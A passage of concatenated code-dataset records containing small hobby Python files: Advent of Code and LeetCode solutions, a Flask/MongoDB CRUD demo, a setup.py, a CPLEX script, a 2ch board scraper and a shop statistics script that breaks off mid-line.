starts with the value 1.\n# Square 2 has only one adjacent filled square (with value 1), so it also stores 1.\n# Square 3 has both of the above squares as neighbors and stores the sum of their values, 2.\n# Square 4 has all three of the aforementioned squares as neighbors and stores the sum of their values, 4.\n# Square 5 only has the first and fourth squares as neighbors, so it gets the value 5.\n# Once a square is written, its value does not change. Therefore, the first few squares would receive the following values:\n\n# 147 142 133 122 59\n# 304 5 4 2 57\n# 330 10 1 1 54\n# 351 11 23 25 26\n# 362 747 806---> ...\n# What is the first value written that is larger than your puzzle input?\n\nimport sys\n\nclass Direction:\n\tdef __init__(self, name, steps):\n\t\tself.name = name\n\t\tself.steps = steps\n\t\t\n\tdef increment(self, pos):\n\t\treturn (pos[0] + self.steps[0], pos[1] + self.steps[1])\n\nMATRIX_SIDE = 15\nDIRECTIONS = [\n\tDirection(\"East\", (+1, 0)),\n\tDirection(\"North\", (0, -1)),\n\tDirection(\"West\", (-1, 0)),\n\tDirection(\"South\", (0, +1))\n]\n\nfor target in sys.stdin:\n\ttarget = int(target)\n\n\tpos = (MATRIX_SIDE // 2, ) * 2\n\tmatrix = [[0] * MATRIX_SIDE for x in range(MATRIX_SIDE)]\n\tmatrix[pos[1]][pos[0]] = cellsum = 1\n\n\tdirection = 0\n\tdirection_steps = 1\n\tturns_until_increase = 2\n\tsteps_per_direction = 1\n\n\twhile cellsum < target:\n\t\tprint('%s %i %s %i %i %i' % (repr(pos), cellsum, DIRECTIONS[direction].name, direction_steps, turns_until_increase, steps_per_direction))\n\t\tpos = DIRECTIONS[direction].increment(pos)\n\t\tdirection_steps -= 1\n\t\tif direction_steps == 0:\n\t\t\tturns_until_increase -= 1\n\t\t\tif turns_until_increase == 0:\n\t\t\t\tsteps_per_direction += 1\n\t\t\t\tturns_until_increase = 2\n\n\t\t\tdirection_steps = steps_per_direction\n\t\t\tdirection = (direction + 1) % 4\n\n\t\tcellsum = 0\n\t\tfor y_rel in [-1, 0, 1]:\n\t\t\tfor x_rel in [-1, 0, 1]:\n\t\t\t\tcellsum += matrix[pos[1] + y_rel][pos[0] + x_rel]\n\t\t\t\t\t\t\n\t\tmatrix[pos[1]][pos[0]] = cellsum\n\n\tprint('%s %i %s %i %i %i' % (repr(pos), cellsum, DIRECTIONS[direction].name, direction_steps, turns_until_increase, steps_per_direction))\n","sub_path":"2017/day03_b.py","file_name":"day03_b.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8966887","text":"from flask import Flask, render_template, request\nfrom bson.objectid import ObjectId\nimport os\nimport env\nimport pymongo\n\n\napp = Flask(__name__)\n\n\n# SET UP - WHAT CLUSTER/SEVER - WHAT DATABASE - WHAT COLLECTION\nMONGO_URI = os.environ.get(\"MONGO_URI\") # What machine to speak to, who I am and my password (+ what database I want to deal with)\nDBS_NAME = \"myFirstMDB\" # What database (serie of \"tables\")\nCOLLECTION_NAME = \"movies\" # What collection (what table)\n\n\n# CONNECTING TO IT\ndef mongo_connect(url):\n try:\n conn = pymongo.MongoClient(url)\n print(\"Mongo is connected!\")\n return conn\n except pymongo.errors.ConnectionFailure as e:\n print(\"Could not connect to MongoDB: %s\") % e\n\n\n# REPRESENTS THE DATABASE SERVER\nconn = mongo_connect(MONGO_URI)\n# REPRESENTS THE COLLECTION\ncoll = conn[DBS_NAME][COLLECTION_NAME]\n\n\n@app.route(\"/\")\ndef home():\n return render_template('hello.html')\n\n\n# CRUD - Create, Read, Update, Delete\n\n\n# CREATE\n@app.route(\"/create\", methods=[\"GET\", \"POST\"])\ndef create():\n\n if request.method == 'GET':\n return render_template('create.html')\n\n if request.method == 'POST':\n # GET THE DATA FROM MY FORM (COMING FROM THE CLIENT)\n title = request.form['title']\n release_year = request.form['release_year']\n synopsis = request.form['synopsis']\n\n # BUILD MY NEW DOC TO CREATE\n my_wonderful_new_document = {'title': title,\n 'release_year': release_year,\n 'synopsis': synopsis}\n\n # SEND IT TO THE DATABASE\n coll.insert_one(my_wonderful_new_document)\n\n return render_template('created.html', document=my_wonderful_new_document)\n\n\n# READ\n@app.route(\"/read\")\ndef read():\n documents = coll.find()\n return render_template('read.html', documents=documents)\n\n\n@app.route(\"/read/\")\ndef read_one(search):\n print('~~~~~~~~~~~~~~~~~~~')\n print(search)\n doc = coll.find_one({'title': search})\n return render_template('found.html', doc=doc)\n\n\n# UPDATE\n@app.route(\"/update\")\ndef update():\n\n # What doc do I want to target for an update ?\n id_ = \"...\"\n what_doc = {'_id': ObjectId(id_)}\n\n # What is the new content for that document ?\n doc_content = {'title': 'Pulp Fiction',\n 'release_year': '1984',\n 'synopsis': 'A gangster movie'}\n\n # update it\n coll.update(what_doc, doc_content)\n\n return render_template('update.html')\n\n\n# DELETE\n@app.route('/delete')\ndef delete():\n\n # What doc do I want to target for an update ?\n id_ = \"...\"\n what_doc = {'_id': ObjectId(id_)}\n\n # remove it\n coll.remove(what_doc)\n\n return render_template('delete.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',\n port=5000,\n debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522631132","text":"from setuptools import setup, find_packages\n\nimport sys\n\nversion = open(\"version.txt\").read().rstrip()\nrequirements = [k.strip() for k in open(\"requirements.txt\").read().split()]\n\nsetup(\n name='gridtk',\n version=version,\n description='Parallel Job Manager',\n long_description=open('README.rst').read(),\n url='https://gitlab.idiap.ch/bob/gridtk',\n license='GPLv3',\n\n author='Manuel Guenther,Andre Anjos',\n author_email='manuel.guenther@idiap.ch,andre.anjos@idiap.ch',\n\n packages=find_packages(),\n include_package_data=True,\n\n install_requires=requirements,\n\n entry_points={\n 'console_scripts': [\n 'jman = gridtk.script.jman:main',\n 'jgen = gridtk.script.jgen:main',\n 'grid = gridtk.script.grid:main',\n\n # program replacements\n 'qstat.py = gridtk.script.grid:main',\n 'qdel.py = gridtk.script.grid:main',\n 'qsub.py = gridtk.script.grid:main',\n 'man.py = gridtk.script.grid:main',\n ],\n\n },\n\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Topic :: System :: Clustering',\n ]\n)\n","sub_path":"pypi_install_script/gridtk-1.6.5/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"154174632","text":"\"\"\"11. Container With Most Water\nhttps://leetcode.com/problems/container-with-most-water/\n\nGiven n non-negative integers a1, a2, ..., an , where each represents a point\nat coordinate (i, ai). n vertical lines are drawn such that the two endpoints\nof the line i is at (i, ai) and (i, 0). Find two lines, which, together with\nthe x-axis forms a container, such that the container contains the most water.\n\nNotice that you may not slant the container.\n\nExample 1:\nInput: height = [1,8,6,2,5,4,8,3,7]\nOutput: 49\nExplanation: The above vertical lines are represented by array\n[1,8,6,2,5,4,8,3,7]. In this case, the max area of water (blue section) the\ncontainer can contain is 49.\n\nExample 2:\nInput: height = [1,1]\nOutput: 1\n\nExample 3:\nInput: height = [4,3,2,1,4]\nOutput: 16\n\nExample 4:\nInput: height = [1,2,1]\nOutput: 2\n\n\nExample 4:\nInput: height = [2,3,4,5,18,17,6]\nOutput: 17\n\n\"\"\"\n\nclass Solution:\n def max_area(self, height: list[int]) -> int:\n max_vol = 0\n i = 0\n j = len(height) - 1\n while i < j:\n if height[i] <= height[j]:\n vol = (j - i) * height[i]\n i += 1\n else:\n vol = (j - i) * height[j]\n j -= 1\n max_vol = max(max_vol, vol)\n return max_vol\n\n# Runtime: 676 ms, faster than 5.25% of Python3 online submissions\n# Memory Usage: 28 MB, less than 20.63% of Python3 online submissions\n\n\nif __name__ == '__main__':\n my_solution = Solution()\n height = [1,8,6,2,5,4,8,3,7]\n # height = [1,8,6,2,5,4,16,3,10]\n # height = [1, 1]\n # height = [4, 3, 2, 1, 4]\n # height = [1, 2, 1]\n # height = [2, 3, 4, 5, 18, 17, 6]\n print(\"height: {}\".format(height))\n print(\"result: {}\".format(my_solution.max_area(height)))\n","sub_path":"00/10-19/0011-container-with-most-water/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"4253728","text":"import pandas as pd\nfrom time import gmtime, strftime\nimport datetime as dt\nclass Interview_question:\n def __init__(self,filename,company,link,type):\n self.filename = filename\n self.company = company\n self.link = link\n self.type = type\n self.starttime = None\n self.endtime = None\n self.spendtime = None\n \n def setTime(self):\n FMT = \"%Y-%m-%d %H:%M:%S\"\n if self.starttime is None:\n self.starttime = strftime(FMT, gmtime())\n elif self.endtime is None:\n self.endtime = strftime(FMT, gmtime())\n spend = dt.datetime.strptime(self.endtime, FMT) - dt.datetime.strptime(self.starttime, FMT)\n self.spend = spend.seconds/60\n \n def to_csv(self):\n f = pd.read_csv(\"Interview_questions.csv\")\n \n \n\n\nx = Interview_question(\"insert_in_ordered_circular_linkedlist.py\",\"Walmartlab\", \"http://www.careercup.com/question?id=13273690\",\"Linkedlist\")","sub_path":"timesheet.py","file_name":"timesheet.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"61068472","text":"import time\r\nimport json\r\n\r\nclass NewsRank:\r\n\r\n def __init__(self, docs):\r\n \"\"\"\r\n\r\n :type docs: list\r\n \"\"\"\r\n self.docs = docs\r\n self.jsonpath = '/Users/liujingkun/Exp/python/scrapy/SearchSpider/SearchSpider/data/'\r\n self.result = []\r\n self.time_dict = {}\r\n self.create_time_dict()\r\n\r\n def create_time_dict(self):\r\n for doc in self.docs:\r\n with open(self.jsonpath+doc+'.json', 'rt', encoding='utf-8') as jsonfp:\r\n try:\r\n jsondata = json.load(jsonfp)\r\n except:\r\n continue\r\n # print(jsondata['id'])\r\n self.time_dict[doc] = jsondata['time']\r\n\r\n def ftime(self, doc):\r\n str_t = self.time_dict.get(doc)\r\n t_tuple = time.strptime(str_t, '%Y-%m-%d %H:%M')\r\n f = time.mktime(t_tuple)\r\n return float(f)\r\n\r\n def sort_by_time(self):\r\n self.result = sorted(self.docs, key=lambda doc: self.ftime(doc), reverse=True)\r\n return self.result\r\n\r\n def sort_by_heat(self, heat_dict):\r\n self.result = sorted(self.docs, key=lambda doc: heat_dict.get(doc), reverse=True)\r\n return self.result\r\n\r\nif __name__ == '__main__':\r\n nr = NewsRank([2, 3, 1])\r\n nr.sort_by_heat({1: 3, 2: 4, 3: 1})\r\n print(nr.result)\r\n nr.sort_by_time()\r\n print(nr.result)\r\n","sub_path":"webview/engine/NewsRank.py","file_name":"NewsRank.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"562533142","text":"#!/usr/bin/env python3\n\"\"\"My solution to day 4 of Advent of Code\nhttp://adventofcode.com/day/4\n\"\"\"\n\nimport sys\nimport hashlib\n\nMAX_TRIES = 2**30\n\ndef mine_adventcoin(hash, start):\n i = 0\n\n while i < MAX_TRIES:\n key = (hash + str(i)).encode()\n coin = hashlib.md5(key).hexdigest()\n if coin.startswith(start):\n return i\n i += 1\n return -1\n\nif __name__ == '__main__' and len(sys.argv) > 1 and len(sys.argv[1]) > 0:\n num = mine_adventcoin(sys.argv[1], '00000')\n if num >= 0:\n print('Found number for \"00000\":', num)\n else:\n print('No number smaller than', MAX_TRIES, 'found for \"00000\"')\n\n num = mine_adventcoin(sys.argv[1], '000000')\n if num >= 0:\n print('Found number for \"000000\":', num)\n else:\n print('No number smaller than', MAX_TRIES, 'found for \"000000\"')\n","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22471925","text":"import os\nimport re\n\nfrom .base import Base, Py2chdlerError\nfrom .thread import Thread\n\nclass Board(Base):\n def __init__(self, bbsmenu, board_name, romaji_board_name, board_url):\n self.bbsmenu = bbsmenu\n self.name = board_name\n self.romaji_name = romaji_board_name\n self.url = board_url + \"subject.txt\"\n self.dir_path = self.bbsmenu.settings['base_dir'] + \"/\" + self.romaji_name\n self.filepath = self.dir_path + \"/subject\"\n self.filepath_old = self.dir_path + \"/subject_old\"\n if not os.path.exists(self.dir_path):\n os.mkdir(self.dir_path)\n elif not os.path.isdir(self.dir_path):\n raise Py2chdlerError(self.dir_path + \" is not a directory.\")\n\n def read(self):\n thread_infos = list()\n self.download(self.url, self.filepath)\n subject = set(self.read_file(self.filepath))\n if os.path.exists(self.filepath_old):\n subject_old = set(self.read_file(self.filepath_old))\n else:\n subject_old = set()\n thread_regex = '^([0-9]*)\\.dat<>(.*)\\(([0-9]*)\\)$'\n p_thread = re.compile(thread_regex)\n # list of updated subject from old_subject\n old_subject = subject_old - subject\n # process each line\n for line in subject:\n # seach thread info with regex\n r_thread = p_thread.search(line)\n # if thread info\n if r_thread:\n thread_id = int(r_thread.group(1))\n res_count = int(r_thread.group(3))\n old_res_count = res_count if subject_old else 0\n for old_line in old_subject:\n old_r_thread = p_thread.search(old_line)\n if old_r_thread:\n if thread_id == int(old_r_thread.group(1)):\n old_res_count = int(old_r_thread.group(3))\n break\n new_res_count = res_count - old_res_count\n thread_info = {'id':thread_id, 'title':r_thread.group(2), 'res_count':res_count, 'new_res_count':new_res_count}\n thread_infos.append(thread_info)\n return thread_infos\n\n def read_raw(self):\n self.download(self.url, self.filepath)\n raw_subject = self.read_raw_file(self.filepath)\n return raw_subject\n\n def get_threads(self, *thread_ids, new=True):\n threads = list()\n # list to store exist thread_ids (for error check)\n exist_thread_ids = list()\n thread_infos = self.read()\n # filter updated thread from thread infos\n if new == True:\n tmp = list()\n for thread_info in thread_infos:\n if not thread_info['new_res_count'] == 0:\n tmp.append(thread_info)\n thread_infos = tmp\n # if thread_ids is empty get all threads\n if len(thread_ids) == 0:\n for thread_info in thread_infos:\n threads = self.__append_thread(threads, thread_info)\n else:\n for thread_info in thread_infos:\n if thread_info['id'] in thread_ids:\n threads = self.__append_thread(threads, thread_info)\n if thread_id in thread_ids:\n exist_thread_ids.append(thread_id)\n # raise err if requested thread_id not exists\n if not len(thread_ids) == len(exist_thread_ids):\n err_thread_ids = set(thread_ids) - set(exist_thread_ids)\n err_thread_ids = ', '.join(err_thread_ids)\n raise Py2chdlerError(\"Thread(s) id: \" + err_thread_ids + \" are/is not exist(s). Or you may request same thread more than once.\")\n return threads\n\n def get_new_threads(self, *thread_ids):\n if thread_ids:\n threads = self.get_threads(thread_ids, new=True)\n else:\n threads = self.get_threads(new=True)\n return threads\n\n\n def get_thread(self, thread_id, new=False):\n threads = self.get_threads(thread_id, new)\n return threads[0]\n\n def get_new_thread(self, thread_id):\n thread = self.get_thread(thread_id, new=True) \n return thread\n\n def __append_thread(self, threads, thread_info):\n thread = Thread(self, thread_info['id'], thread_info['title'])\n threads.append(thread)\n return threads\n\nif __name__ == '__main__':\n import time\n from .bbsmenu import Bbsmenu\n homedir = os.path.expanduser('~')\n settings = {'base_dir': os.path.abspath(homedir + '/py2chdler/data')}\n bbsmenu = Bbsmenu(settings, 'http://menu.2ch.net/bbsmenu.html')\n boards = bbsmenu.get_boards('news4vip')\n for board in boards:\n threads = board.get_threads()\n for thread in threads:\n print(thread.title)\n","sub_path":"pytwoch/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"171947929","text":"import cplex.exceptions\n\ntry:\n my_cplex = cplex.Cplex()\n my_cplex.read(\"problem3.lp\")\n my_cplex.solve()\nexcept Exception as e:\n print(e)\n print(\"error on Cplex exception!\")\n\nprint(\"Solution value = \", my_cplex.solution.get_objective_value())\nx = my_cplex.solution.get_values()\nprint(\"three months:\")\nfor i in range(4):\n if x[i] != 0:\n print(\"month \"+str(i)+\":\"+str(x[i]))\nprint(\"four months:\")\nfor i in range(3):\n if x[i+4] != 0:\n print(\"month \"+str(i)+\":\"+str(x[i+4]))\nprint(\"five months:\")\nfor i in range(2):\n if x[i+7] != 0:\n print(\"month \"+str(i)+\":\"+str(x[i+7]))\nmy_cplex.solution.write(\"problem3_solution.txt\")\n\n","sub_path":"cplex_test/物流实验-李想2016211876/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605595730","text":"\"\"\"\r\nAuthor: Nguyen Van Hoang\r\nDate: 16/09/2021\r\nProblem:Octal numbers have a base of eight and the digits 0–7. Write the scripts octalToDecimal.\r\npy and decimalToOctal.py, which convert numbers between the octal\r\nand decimal representations of integers. These scripts use algorithms that are\r\nsimilar to those of the binaryToDecimal and decimalToBinary scripts developed in Section 4-3.\r\nSolution:\r\n\r\n ....\r\n\"\"\"\r\no_t_n = int(input('Enter a string of octal digits: '))\r\ni = 1\r\ndc = 0\r\nwhile (o_t_n != 0):\r\n rmd = o_t_n % 10\r\n o_t_n //= 10\r\n dc += rmd * i\r\n i *= 8\r\nprint('The integer value is ', dc)\r\n\"\"\"\r\n\"\"\"\r\nd_c_n = int(input('Enter a decimal integer: '))\r\nprint(\"Quotient Remainder Octal\")\r\ni = 1\r\no_c_n = 0\r\nnum = \"\"\r\nwhile (d_c_n != 0):\r\n rm = d_c_n % 8\r\n d_c_n //= 8\r\n o_c_n = o_c_n + rm * i\r\n i *= 10\r\n num = str(rm)+num\r\n print(\"%5d%8d%12s\" % (d_c_n, rm, num))\r\nprint('The octal representation is ', o_c_n)","sub_path":"page_132_project_04.py","file_name":"page_132_project_04.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"285660787","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nfrom models import *\nfrom myfarm.settings import *\n\ndef create_category_top(top_tag, parent_id):\n ertongfang = top_tag.get('children', None)\n depth = 1\n create_category(ertongfang, parent_id, depth)\n\n\ndef create_category(data, parent_id, depth):\n if type(data) in (list, tuple, set):\n if len(data) == 1:\n data = data[0]\n else:\n for item in data:\n create_category(item, parent_id, depth)\n return\n try:\n tag = {\n 'no': generate_uuid(),\n 'state': 1,\n 'depth': depth,\n 'alias_name': data['name'],\n 'name': data['name'],\n 'parent_id': parent_id,\n }\n category, created = Category.objects.get_or_create(**tag)\n except:\n print(\"data:{}, parent_id:{}, depth:{}\".format(data, parent_id, depth))\n parent_id2 = category.id if category else 0\n\n children = data.get('children', None)\n if children:\n depth += 1\n for child in children:\n create_category(child, parent_id2, depth)\n\n\ndef generate_all_categories():\n categorys_tags = ITEM_TAG_SETS['AREA_TAGS']\n import json\n used_tags = [keting_tag, canting_tag, woshi_tag, shufang_tag, ertongfang_tag]\n dict_used_tags = dict()\n for tag in used_tags:\n dict_used_tags.update({tag['name']: {'tag': tag}})\n for data in categorys_tags:\n tag = {\n 'no': generate_uuid(),\n 'state': 1,\n 'depth': 1,\n 'alias_name': data['id'],\n 'name': data['name'],\n }\n category, created = Category.objects.get_or_create(**tag)\n if data['name'] in dict_used_tags.keys():\n dict_used_tags[data['name']].update({'id': category.id})\n for name, dict_value in dict_used_tags.iteritems():\n create_category_top(dict_value['tag'], dict_value['id'])\n\n\n # for i in range(5000000):\n # item = item_sample\n # item['no'] = generate_uuid()\n # item['category'] = random.sample(noes, 5)\n #\n # print(item['no'], item['category'][0])\n # Item(**item).save()\n\ndef generate_item(count=5):\n global NOes\n if not NOes:\n all_noes = Category.objects.only(\"id\") #.filter(state__in=(StateEnum.VALID, StateEnum.TEMPORARY) )\n NOes =[cat.id for cat in all_noes]\n for i in range(count):\n item = item_sample\n # print(\"item:{}\".format(item))\n item['no'] = generate_uuid()\n category_ids = random.sample(NOes, random.randint(2,5))\n # print(\"item_no:{}, category_ids:{}\".format(item['no'],category_ids))\n Item(**item).save()\n for category_id in category_ids:\n item_cat = {'category_id': int(category_id) ,\n 'item_no': item['no']}\n itemCat = ItemCategory(**item_cat)\n\n itemCat.save()\n\n\nif __name__ == '__main__':\n\n # item = Item(no=generate_uuid(), width=12, height=10, length=10, merchant=['ifuwo', '1jbest', 'yunchao'])\n # item.save()\n # item = Item()\n # item.no = generate_uuid()\n # item.product_name = 'test'\n # print item.no\n # item.save()\n # model_flag={'octane': 1, 'max': 0, 'model': 1}).save()\n # comment1 = Comment(content='Good work magic, please continue !')\n # comment1.save()\n # comment2 = Comment(content='This is my mongodb orm test, it is nice')\n # page = Page(comments=[comment1, comment2]).save()\n\n # generate_all_categories()\n\n generate_item(5000000)","sub_path":"demo/myfarm/init_models.py","file_name":"init_models.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"158789526","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport datetime\nfrom collections import defaultdict\nimport operator\nfrom helpers import *\nimport sys\nimport db\n\ndef getUser():\n\twhile 1:\n\t\tstring = input('user? ')\n\t\tsession = Session()\n\t\tuser = search_user(string, session)\n\t\tsession.close()\n\t\tif not isinstance(user, list):\t\n\t\t\treturn user.name\n\t\ti=0\n\t\tif len(user)==0:\n\t\t\tprint('no matching string')\n\t\tif len(user)==1:\n\t\t\tprint('antar: ', user[0].name, '\\n')\n\t\t\treturn user[0].name\n\t\tif len(user)>10:\n\t\t\tcontinue\n\t\tfor u in user:\n\t\t\tprint(i, u.name)\n\t\t\ti += 1\n\t\ttry:\n\t\t\tn = int(input ('enter number:'))\n\t\texcept:\n\t\t\tprint('invalid input, restarting')\n\t\t\tcontinue\n\t\tif (n>-1) and (n10:\n\t\t\tcontinue\n\t\tfor u in product:\n\t\t\tprint(i, u.name)\n\t\t\ti += 1\n\t\ttry:\n\t\t\tn = int(input ('enter number:'))\n\t\texcept:\n\t\t\tprint('invalid input, restarting')\n\t\t\tcontinue\n\t\tif (n>-1) and (narray\n\tvareUkedagAntall = defaultdict(list)\n\t#for personer\n\tpersonVareAntall = defaultdict(dict) #personVareAntall[trygvrad][Oreo] == 3\n\tpersonVareVerdi = defaultdict(dict) #personVareVerdi[trygvrad][Oreo] == 30 #[kr]\n\tpersonDatoVerdi = defaultdict(list) #dict->array\n\tpersonUkedagVerdi = defaultdict(list)\n\t#for global\n\tpersonPosTransactions = {} # personPosTransactions[trygvrad] == 100 #trygvrad har lagt 100kr i boksen\n\tpersonNegTransactions = {} # personNegTransactions[trygvrad» == 70 #trygvrad har tatt 70kr fra boksen\n\tglobalVareAntall = {}#globalVareAntall[Oreo] == 3\n\tglobalVareVerdi = {}#globalVareVerdi[Oreo] == 30 #[kr]\n\tglobalPersonAntall = {}#globalPersonAntall[trygvrad] == 3\n\tglobalPersonForbruk = {}#globalPersonVerdi == 30 #[kr]\n\tglobalUkedagForbruk = []\n\tglobalDatoVarer = [] \n\tglobalDatoForbruk = []\n\tpengebeholdning = []\n\nclass InputLine:\n\tdef __init__(self, u, p, t):\n\t\tself.inputUser = u\n\t\tself.inputProduct = p\n\t\tself.inputType = t\n\ndef getDateDb(date, inp):\n\ttry:\n\t\tyear = inp.partition('-')\n\t\tmonth = year[2].partition('-')\n\t\treturn datetime.datetime(int(year[0]), int(month[0]), int(month[2]))\n\texcept:\n\t\tprint('invalid date, setting date to date found in db')\n\t\tprint(date)\n\t\treturn date\n\ndef dateToDateNumDb(date, startDate):\n\tdeltaDays = date-startDate\n\treturn int(deltaDays.days), date.weekday()\n\ndef getInputType():\n\tinp = 0\n\twhile not (inp == '1' or inp == '2' or inp == '3' or inp == '4'):\n\t\tprint('type 1 for user-statistics')\n\t\tprint('type 2 for product-statistics')\n\t\tprint('type 3 for global-statistics')\n\t\tprint('type 4 to enter loop-mode')\n\t\tinp = input('')\n\treturn int(inp)\n\ndef getProducts(products):\n\tproduct = []\n\tproducts = products.partition('¤')\n\tproduct.append(products[0])\n\twhile (products[1]=='¤'):\n\t\tproducts = products[2].partition('¤')\n\t\tproduct.append(products[0])\n\treturn product\n\ndef getDateFile(date, inp):\n\ttry:\n\t\tyear = inp.partition('-')\n\t\tmonth = year[2].partition('-')\n\t\treturn datetime.date(int(year[0]), int(month[0]), int(month[2]))\t\n\texcept:\n\t\tprint('invalid date, setting date to date found on file file')\n\t\tprint(date)\n\t\treturn datetime.date(int(date.partition('-')[0]), int(date.partition('-')[2].partition('-')[0]), int(date.partition('-')[2].partition('-')[2]))\n\ndef dateToDateNumFile(date, startDate):\n\tyear = date.partition('-')\n\tmonth = year[2].partition('-')\n\tday = datetime.date(int(year[0]), int(month[0]), int(month[2]))\n\tdeltaDays = day-startDate\n\treturn int(deltaDays.days), day.weekday()\n\t\ndef clearDatabase(database):\n\tdatabase.varePersonAntall.clear()\n\tdatabase.vareDatoAntall.clear()\n\tdatabase.vareUkedagAntall.clear()\n\tdatabase.personVareAntall.clear()\n\tdatabase.personVareVerdi.clear()\n\tdatabase.personDatoVerdi.clear()\n\tdatabase.personUkedagVerdi.clear()\n\tdatabase.personPosTransactions.clear()\n\tdatabase.personNegTransactions.clear()\n\tdatabase.globalVareAntall.clear()\n\tdatabase.globalVareVerdi.clear()\n\tdatabase.globalPersonAntall.clear()\n\tdatabase.globalPersonForbruk.clear()\n\treturn(database)\n\ndef addLineToDatabase(database, inputLine):\n\tif abs(inputLine.price)>90000:\n\t\treturn database\n\t#fyller inn for varer\n\tif (not inputLine.product=='') and ((inputLine.inputProduct=='') or (inputLine.inputProduct==inputLine.product)):\n\t\tdatabase.varePersonAntall[inputLine.product][inputLine.user] = database.varePersonAntall[inputLine.product].setdefault(inputLine.user,0) + 1\t\n\t\tif inputLine.product not in database.vareDatoAntall:\n\t\t\tdatabase.vareDatoAntall[inputLine.product] = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.vareDatoAntall[inputLine.product][inputLine.dateNum] += 1\n\t\tif inputLine.product not in database.vareUkedagAntall:\n\t\t\tdatabase.vareUkedagAntall[inputLine.product] = [0]*7\n\t\tdatabase.vareUkedagAntall[inputLine.product][inputLine.weekday] += 1\n\t#fyller inn for personer\n\tif (inputLine.inputUser=='') or (inputLine.inputUser==inputLine.user):\n\t\tif not inputLine.product == '':\n\t\t\tdatabase.personVareAntall[inputLine.user][inputLine.product] = database.personVareAntall[inputLine.user].setdefault(inputLine.product,0) + 1\n\t\t\tdatabase.personVareVerdi[inputLine.user][inputLine.product] = database.personVareVerdi[inputLine.user].setdefault(inputLine.product,0) + inputLine.price\n\t\t\tif inputLine.user not in database.personDatoVerdi:\n\t\t\t\tdatabase.personDatoVerdi[inputLine.user] = [0]*(inputLine.numberOfDays+1)\n\t\t\tdatabase.personDatoVerdi[inputLine.user][inputLine.dateNum] += inputLine.price\n\t\t\tif inputLine.user not in database.personUkedagVerdi:\n\t\t\t\tdatabase.personUkedagVerdi[inputLine.user] = [0]*7\n\t\t\tdatabase.personUkedagVerdi[inputLine.user][inputLine.weekday] += inputLine.price\n\t#fyller inn delt statistikk (genereres uansett)\n\tif (inputLine.product==''):\n\t\tif (inputLine.price>0):\n\t\t\tdatabase.personPosTransactions[inputLine.user] = database.personPosTransactions.setdefault(inputLine.user,0) + inputLine.price\n\t\telse:\n\t\t\tdatabase.personNegTransactions[inputLine.user] = database.personNegTransactions.setdefault(inputLine.user,0) + inputLine.price\n\telif not (inputLine.inputType==1):\n\t\tdatabase.globalVareAntall[inputLine.product] = database.globalVareAntall.setdefault(inputLine.product,0) + 1\n\t\tdatabase.globalVareVerdi[inputLine.product] = database.globalVareVerdi.setdefault(inputLine.product,0) + inputLine.price\n\t\t\t\t\t\n\t#fyller inn for global statistikk\n\tif (inputLine.inputType==3) or (inputLine.inputType==4):\n\t\tdatabase.pengebeholdning[inputLine.dateNum] += inputLine.price\n\t\tif not (inputLine.product==''):\n\t\t\tdatabase.globalPersonAntall[inputLine.user] = database.globalPersonAntall.setdefault(inputLine.user,0) + 1\n\t\t\tdatabase.globalPersonForbruk[inputLine.user] = database.globalPersonForbruk.setdefault(inputLine.user,0) + inputLine.price\n\t\t\tdatabase.globalDatoVarer[inputLine.dateNum] += 1\n\t\t\tdatabase.globalDatoForbruk[inputLine.dateNum] += inputLine.price\n\t\t\tdatabase.globalUkedagForbruk[inputLine.weekday] += inputLine.price\n\treturn database\n\ndef buildDatabaseFromDb(inputType, inputProduct, inputUser):\n\tsdate = input('enter start date (yyyy-mm-dd)? ')\n\tedate = input('enter end date (yyyy-mm-dd)? ')\n\tprint('building database...')\t\n\tsession = Session()\n\ttransaction_list = session.query(Transaction).all()\n\tinputLine = InputLine(inputUser, inputProduct, inputType)\n\tstartDate = getDateDb(transaction_list[0].time, sdate)\n\tendDate = getDateDb(transaction_list[-1].time, edate)\n\tinputLine.numberOfDays = (endDate-startDate).days\n\tdatabase = Database()\n\tdatabase = clearDatabase(database)\n\n\tif (inputType==3) or (inputType==4):\n\t\tdatabase.globalDatoVarer = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalDatoForbruk = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalUkedagForbruk = [0]*7\n\t\tdatabase.pengebeholdning = [0]*(inputLine.numberOfDays+1)\n\tprint('wait for it.... ')\n\tfor transaction in transaction_list:\n\t\tif transaction.purchase:\n\t\t\tproducts = [ent.product.name for ent in 